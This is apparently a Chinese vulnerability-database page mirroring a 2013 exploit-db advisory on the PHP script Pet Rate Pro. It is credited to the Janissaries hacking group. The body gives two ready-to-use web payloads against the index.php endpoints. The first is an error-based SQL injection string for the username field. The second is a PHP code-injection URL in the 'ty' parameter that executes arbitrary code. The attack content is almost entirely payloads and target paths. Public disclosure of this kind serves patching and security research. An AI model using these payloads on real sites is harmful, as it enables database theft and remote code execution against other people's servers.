Scripts Genie Pet Rate Pro - Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1064738 漏洞类型
发布时间 2013-02-18 更新时间 2013-02-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24514
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#########################################################################
#     __              .__                            .__                #
#    |__|____    ____ |__| ______ ___________ _______|__| ____   ______ #
#    |  \__  \  /    \|  |/  ___//  ___/\__  \\_  __ \  |/ __ \ /  ___/ #
#    |  |/ __ \|   |  \  |\___ \ \___ \  / __ \|  | \/  \  ___/ \___ \  #
#/\__|  (____  /___|  /__/____  >____  >(____  /__|  |__|\___  >____  > #
#\______|    \/     \/        \/     \/      \/              \/     \/  #
#                                                 www.janissaries.org   #
##=====================================================================##  

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»               Pet Rate Pro Multi Vulnerability             «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Pet Rate Pro Multi Vulnerability
 ./WebApps URL   :http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro
 ./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
 ./Security Risk : [ High Level ]
 ./Category XPL  : [ WebApps]
 ./Time & Date   : 18.02.2013. 09:50 PM.
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 #################################################################################
 #
 #   #=> Exploit: SQL injection
 # http://[target]/[path]//demo/PetRatePro/index.php?cmd=4  
 # Demo: 
 # URL encoded POST input username was set to 
 # 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
 # 
 #    #=> Exploit: Code Ýnjection
 # 
 # http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d"
 # Demo: 
 # http://server/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22
 # 
 # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
 # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
 #################################################################################